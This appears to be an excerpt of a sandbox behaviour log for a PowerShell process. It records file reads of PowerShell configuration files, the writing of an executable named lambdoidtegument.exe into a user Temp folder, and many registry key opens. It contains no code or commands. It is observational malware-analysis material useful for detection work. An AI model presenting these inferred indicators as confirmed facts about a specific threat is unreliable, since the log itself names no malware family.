Create	C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml	desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml	desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml	desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml	desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml	desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml	desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml	desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml	desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml	desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Windows\Microsoft.NET\Framework\v2.0.50727\Config\machine.config	desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Temp\lambdoidtegument.exe	desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ	1	Fn
Get Info	C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll	type = file_attributes	2	Fn
Get Info	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.config	type = file_attributes	3	Fn
Get Info	C:\Windows\System32\WindowsPowerShell\v1.0	type = file_attributes	2	Fn
Get Info	C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml	type = file_attributes	2	Fn
Get Info	C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml	type = file_attributes	2	Fn
Get Info	C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml	type = file_type	2	Fn
Get Info	C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml	type = file_type	2	Fn
Get Info	C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml	type = file_attributes	2	Fn
Get Info	C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml	type = file_attributes	2	Fn
Get Info	C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml	type = file_attributes	2	Fn
Get Info	C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml	type = file_attributes	2	Fn
Get Info	C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml	type = file_attributes	2	Fn
Get Info	C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml	type = file_attributes	2	Fn
Get Info	C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml	type = file_attributes	2	Fn
Get Info	C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml	type = file_attributes	2	Fn
Get Info	C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml	type = file_attributes	2	Fn
Get Info	C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml	type = file_type	2	Fn
Get Info	C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml	type = file_type	4	Fn
Get Info	C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml	type = file_type	2	Fn
Get Info	C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml	type = file_type	2	Fn
Get Info	C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml	type = file_type	2	Fn
Get Info	C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml	type = file_type	2	Fn
Get Info	C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml	type = file_type	2	Fn
Get Info	C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml	type = file_type	2	Fn
Get Info	C:\Users\BGC6u8Oy yXGxkR	type = file_attributes	1	Fn
Get Info	C:\	type = file_attributes	6	Fn
Get Info	C:\Windows\system32	type = file_attributes	7	Fn
Get Info	C:\Windows	type = file_attributes	4	Fn
Get Info	C:\Windows\System32\WindowsPowerShell\v1.0\profile.ps1	type = file_attributes	1	Fn
Get Info	C:\Windows\System32\WindowsPowerShell\v1.0\Microsoft.PowerShell_profile.ps1	type = file_attributes	1	Fn
Get Info	C:\Users\BGC6u8Oy yXGxkR\Documents\WindowsPowerShell\profile.ps1	type = file_attributes	1	Fn
Get Info	C:\Users\BGC6u8Oy yXGxkR\Documents\WindowsPowerShell\Microsoft.PowerShell_profile.ps1	type = file_attributes	1	Fn
Get Info	C:\Windows\Microsoft.NET\Framework\v2.0.50727\Config\machine.config	type = file_attributes	2	Fn
Get Info	C:\Windows\Microsoft.NET\Framework\v2.0.50727\Config\machine.config	type = file_type	2	Fn
Get Info	C:\Windows\Microsoft.NET\Framework\v2.0.50727\Config\machine.config	type = size, size_out = 0	1	Fn
Get Info	C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Temp\lambdoidtegument.exe	type = file_type	2	Fn
Get Info	C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Temp\lambdoidtegument.exe	type = file_attributes	3	Fn
Open	STD_INPUT_HANDLE	-	1	Fn
Read	C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml	size = 4096, size_out = 4096	3	Fn Data
Read	C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml	size = 4096, size_out = 3315	1	Fn Data
Read	C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml	size = 781, size_out = 0	1	Fn
Read	C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml	size = 4096, size_out = 0	1	Fn
Read	C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml	size = 4096, size_out = 4096	41	Fn Data
Read	C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml	size = 4096, size_out = 436	1	Fn Data
Read	C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml	size = 4096, size_out = 0	1	Fn
Read	C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml	size = 4096, size_out = 4096	6	Fn Data
Read	C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml	size = 4096, size_out = 2530	1	Fn Data
Read	C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml	size = 542, size_out = 0	1	Fn
Read	C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml	size = 4096, size_out = 0	1	Fn
Read	C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml	size = 4096, size_out = 4096	11	Fn Data
Read	C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml	size = 4096, size_out = 4018	1	Fn Data
Read	C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml	size = 78, size_out = 0	1	Fn
Read	C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml	size = 4096, size_out = 0	2	Fn
Read	C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml	size = 4096, size_out = 2762	1	Fn Data
Read	C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml	size = 310, size_out = 0	1	Fn
Read	C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml	size = 4096, size_out = 4096	17	Fn Data
Read	C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml	size = 4096, size_out = 3022	1	Fn Data
Read	C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml	size = 50, size_out = 0	1	Fn
Read	C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml	size = 4096, size_out = 0	1	Fn
Read	C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml	size = 4096, size_out = 4096	6	Fn Data
Read	C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml	size = 4096, size_out = 281	1	Fn Data
Read	C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml	size = 4096, size_out = 0	1	Fn
Read	C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml	size = 4096, size_out = 4096	62	Fn Data
Read	C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml	size = 4096, size_out = 3895	1	Fn Data
Read	C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml	size = 201, size_out = 0	1	Fn
Read	C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml	size = 4096, size_out = 0	1	Fn
Read	C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml	size = 4096, size_out = 4096	21	Fn Data
Read	C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml	size = 4096, size_out = 3687	1	Fn Data
Read	C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml	size = 409, size_out = 0	1	Fn
Read	C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml	size = 4096, size_out = 0	1	Fn
Read	C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml	size = 4096, size_out = 4096	4	Fn Data
Read	C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml	size = 4096, size_out = 2228	1	Fn Data
Read	C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml	size = 844, size_out = 0	1	Fn
Read	C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml	size = 4096, size_out = 0	1	Fn
Read	C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml	size = 4096, size_out = 4096	4	Fn Data
Read	C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml	size = 4096, size_out = 3736	1	Fn Data
Read	C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml	size = 360, size_out = 0	1	Fn
Read	C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml	size = 4096, size_out = 0	1	Fn
Read	C:\Windows\Microsoft.NET\Framework\v2.0.50727\Config\machine.config	size = 4096, size_out = 4096	6	Fn Data
Read	C:\Windows\Microsoft.NET\Framework\v2.0.50727\Config\machine.config	size = 4096, size_out = 1459	1	Fn Data
Read	C:\Windows\Microsoft.NET\Framework\v2.0.50727\Config\machine.config	size = 4096, size_out = 0	1	Fn
Write	C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Temp\lambdoidtegument.exe	size = 4096	10	Fn Data
Write	C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Temp\lambdoidtegument.exe	size = 8738	1	Fn Data
Write	C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Temp\lambdoidtegument.exe	size = 22300	1	Fn Data
Write	C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Temp\lambdoidtegument.exe	size = 7260	1	Fn Data
Write	C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Temp\lambdoidtegument.exe	size = 17012	1	Fn Data
Write	C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Temp\lambdoidtegument.exe	size = 5808	1	Fn Data
Write	C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Temp\lambdoidtegument.exe	size = 15040	1	Fn Data
Write	C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Temp\lambdoidtegument.exe	size = 4356	2	Fn Data
Write	C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Temp\lambdoidtegument.exe	size = 30492	2	Fn Data
Write	C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Temp\lambdoidtegument.exe	size = 15972	1	Fn Data
Write	C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Temp\lambdoidtegument.exe	size = 23492	1	Fn Data
Write	C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Temp\lambdoidtegument.exe	size = 11290	1	Fn Data

Registry (211)

Operation	Key	Additional Information	Count	Logfile
Open Key	HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell	-	1	Fn
Open Key	HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1	-	1	Fn
Open Key	HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	-	1	Fn
Open Key	HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment	-	1	Fn
Open Key	HKEY_CURRENT_USER\Environment	-	1	Fn
Open Key	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell	-	2	Fn
Open Key	HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	-	2	Fn
Open Key	HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	-	9	Fn
Open Key	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN	-	1	Fn
Open Key	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN	-	1	Fn
Open Key	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	-	1	Fn
Open Key	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application	-	1	Fn
Open Key	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application\PowerShell	-	4	Fn
Open Key	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents	-	1	Fn
Open Key	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents\PowerShell	-	4	Fn
Open Key	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer	-	1	Fn
Open Key	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer\PowerShell	-	4	Fn
Open Key	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service	-	1	Fn
Open Key	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service\PowerShell	-	4	Fn
Open Key	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center	-	1	Fn
Open Key	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center\PowerShell	-	4	Fn
Open Key	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts	-	1	Fn
Open Key	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts\PowerShell	-	4	Fn
Open Key	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security	-	4	Fn
Open Key	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System	-	1	Fn
Open Key	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System\PowerShell	-	4	Fn
Open Key	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell	-	1	Fn
Open Key	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell	-	1	Fn
Open Key	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	-	1	Fn
Open Key	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application	-	1	Fn
Open Key	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents	-	1	Fn
Open Key	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer	-	1	Fn
Open Key	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service	-	1	Fn
Open Key	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center	-	1	Fn
Open Key	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts	-	1	Fn
Open Key	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System	-	1	Fn
Open Key	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell	-	1	Fn
Open Key	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell	-	1	Fn
Open Key	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	-	1	Fn
Open Key	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application	-	1	Fn
Open Key	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents	-	1	Fn
Open Key	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer	-	1	Fn
Open Key	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service	-	1	Fn
Open Key	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center	-	1	Fn
Open Key	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts	-	1	Fn
Open Key	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System	-	1	Fn
Open Key	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell	-	1	Fn
Open Key	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell	-	1	Fn
Open Key	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	-	1	Fn
Open Key	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application	-	1	Fn
Open Key	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents	-	1	Fn
Open Key	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer	-	1	Fn
Open Key	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service	-	1	Fn
Open Key	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center	-	1	Fn
Open Key	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts	-	1	Fn
Open Key	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System	-	1	Fn
Open Key	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell	-	1	Fn
Open Key	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell	-	1	Fn
Open Key	HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	-	1	Fn
Open Key	HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	-	2	Fn
Open Key	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds	-	1	Fn
Open Key	HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion	-	1	Fn
Open Key	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance	-	1	Fn
Open Key	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance	-	1	Fn
Open Key	HKEY_CURRENT_USER	-	1	Fn
Open Key	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	-	1	Fn
Open Key	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	-	1	Fn
Open Key	HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings	-	1	Fn
Open Key	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds	-	1	Fn
Read Value	HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	value_name = ApplicationBase, data = 0, type = REG_SZ	1	Fn
Read Value	HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ	1	Fn
Read Value	HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment	value_name = PSMODULEPATH, data = 0, type = REG_EXPAND_SZ	1	Fn
Read Value	HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment	value_name = PSMODULEPATH, data = %SystemRoot%\system32\WindowsPowerShell\v1.0\Modules\, type = REG_EXPAND_SZ	1	Fn
Read Value	HKEY_CURRENT_USER\Environment	value_name = PSMODULEPATH, type = REG_NONE	1	Fn
Read Value	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell	value_name = path, data = 0, type = REG_SZ	4	Fn
Read Value	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell	value_name = path, data = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, type = REG_SZ	2	Fn
Read Value	HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	value_name = ApplicationBase, data = 0, type = REG_SZ	2	Fn
Read Value	HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ	2	Fn
Read Value	HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	value_name = ApplicationBase, data = 0, type = REG_SZ	9	Fn
Read Value	HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ	9	Fn
Read Value	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN	value_name = StackVersion, data = 0, type = REG_SZ	1	Fn
Read Value	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN	value_name = StackVersion, data = 2.0, type = REG_SZ	1	Fn
Read Value	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN	value_name = StackVersion, data = 0, type = REG_SZ	1	Fn
Read Value	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN	value_name = StackVersion, data = 2.0, type = REG_SZ	1	Fn
Read Value	HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	value_name = ApplicationBase, data = 0, type = REG_SZ	1	Fn
Read Value	HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ	1	Fn
Read Value	HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	value_name = ApplicationBase, data = 0, type = REG_SZ	2	Fn
Read Value	HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ	2	Fn
Read Value	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds	value_name = PipelineMaxStackSizeMB, type = REG_NONE	1	Fn
Read Value	HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion	value_name = InstallationType, data = 0, type = REG_SZ	1	Fn
Read Value	HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion	value_name = InstallationType, data = Client, type = REG_SZ	1	Fn
Read Value	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance	value_name = Library, data = 0, type = REG_SZ	1	Fn
Read Value	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance	value_name = Library, data = netfxperf.dll, type = REG_SZ	1	Fn
Read Value	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance	value_name = IsMultiInstance, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Read Value	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance	value_name = IsMultiInstance, data = 1, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Read Value	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance	value_name = First Counter, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Read Value	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance	value_name = First Counter, data = 4160, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Read Value	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance	value_name = CategoryOptions, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Read Value	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance	value_name = CategoryOptions, data = 3, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Read Value	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance	value_name = FileMappingSize, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Read Value	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance	value_name = FileMappingSize, data = 131072, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Read Value	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance	value_name = Counter Names, type = REG_BINARY	2	Fn Data
Read Value	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds	value_name = PipelineMaxStackSizeMB, type = REG_NONE	1	Fn
Enumerate Keys	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	-	1	Fn
Enumerate Keys	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	-	1	Fn
Enumerate Keys	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	-	1	Fn
Enumerate Keys	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	-	1	Fn
Enumerate Keys	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	-	1	Fn
Enumerate Keys	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	-	1	Fn
Enumerate Keys	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	-	1	Fn
Enumerate Keys	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	-	1	Fn
Enumerate Keys	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	-	1	Fn
Enumerate Keys	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	-	1	Fn
Enumerate Keys	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	-	1	Fn
Enumerate Keys	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	-	1	Fn
Enumerate Keys	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	-	1	Fn
Enumerate Keys	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	-	1	Fn
Enumerate Keys	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	-	1	Fn
Enumerate Keys	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	-	1	Fn
